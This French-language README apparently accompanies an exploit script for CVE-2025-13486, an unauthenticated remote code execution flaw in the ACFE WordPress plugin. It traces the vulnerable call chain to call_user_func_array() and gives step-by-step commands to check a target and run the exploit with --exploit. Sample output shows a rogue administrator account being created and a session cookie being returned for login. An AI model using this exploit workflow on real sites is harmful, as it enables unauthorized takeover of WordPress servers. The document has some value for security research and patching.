
CVE-2025-13486 - Exploit d'exécution de code à distance et d'élévation de privilèges
Exploit pour la CVE-2025-13486 découverte par Marcin Dudek (dudekmar)
Ce dépôt est fourni uniquement à des fins de recherche et de sécurité défensive. L'auteur décline toute responsabilité en cas d'utilisation abusive de ces informations.
Le plugin Advanced Custom Fields : Extended (ACFE) pour WordPress est vulnérable à l'exécution de code à distance (RCE) dans les versions 0.9.0.5 à 0.9.1.1.
La vulnérabilité se trouve dans la fonction prepare_form(), qui accepte une entrée contrôlée par l'utilisateur et la transmet à call_user_func_array() sans validation appropriée.
Cela permet à des attaquants non authentifiés d'exécuter du code PHP arbitraire sur le serveur de manière limitée, mais néanmoins suffisante pour créer un compte administrateur et se connecter.
La chaîne de vulnérabilité est la suivante :
includes/modules/form/module-form-front.php:24 -> L'action wp_ajax_nopriv_acfe/form/render_form_ajax déclenche le gestionnaire render_form_ajax.
includes/modules/form/module-form-front.php:492 -> Le filtre acfe/form/prepare_form est appliqué, invoquant la fonction prepare_form().
includes/modules/form/module-form-front-render.php:151 -> Les données $form contrôlées par l'utilisateur sont passées directement à call_user_func_array().
Installer les dépendances Python :
python3 -m venv venv
venv/bin/pip install -r requirements.txt
Identifier une cible WordPress vulnérable.
La cible doit contenir une page avec un formulaire généré par ACFE.
venv/bin/python3 CVE-2025-13486.py -t http://127.0.0.1:8000/\?page_id=2
Exemple de sortie :
[2025-12-19] [11:00:46] [success] ACFE version is vulnerable: 0.9.1.1
[2025-12-19] [11:03:30] [info] Use `--exploit` to perform exploitation.
Relancez le script avec l'option --exploit :
venv/bin/python3 CVE-2025-13486.py -t http://127.0.0.1:8000/\?page_id=2 --exploit
Exemple de sortie :
[2025-12-19] [11:00:13] [success] ACFE version is vulnerable: 0.9.1.1
[2025-12-19] [11:00:13] [success] ACFE nonce found: c5d75e0d16
[2025-12-19] [11:00:14] [success] Account created: adm1n:2c5c87a94a2c5c87a94a (administrator)
[2025-12-19] [11:00:14] [success] Authentication succeded!
[2025-12-19] [11:00:14] [info] Cookie: wordpress_4411def9d576984c8d78253236b2a62f=adm1n%7C1766311214%7CwVDbFsbQpjYMM6ckgEQ6gwr6dcjIRhmqYed7Y46YqHJ%7C2f7857614d5ebe1216922dab79c3a8be7164cccde0869e1545f3bfb17c5d2859
Utilisez le cookie d'authentification WordPress renvoyé pour vous connecter en tant que nouveau compte administrateur créé.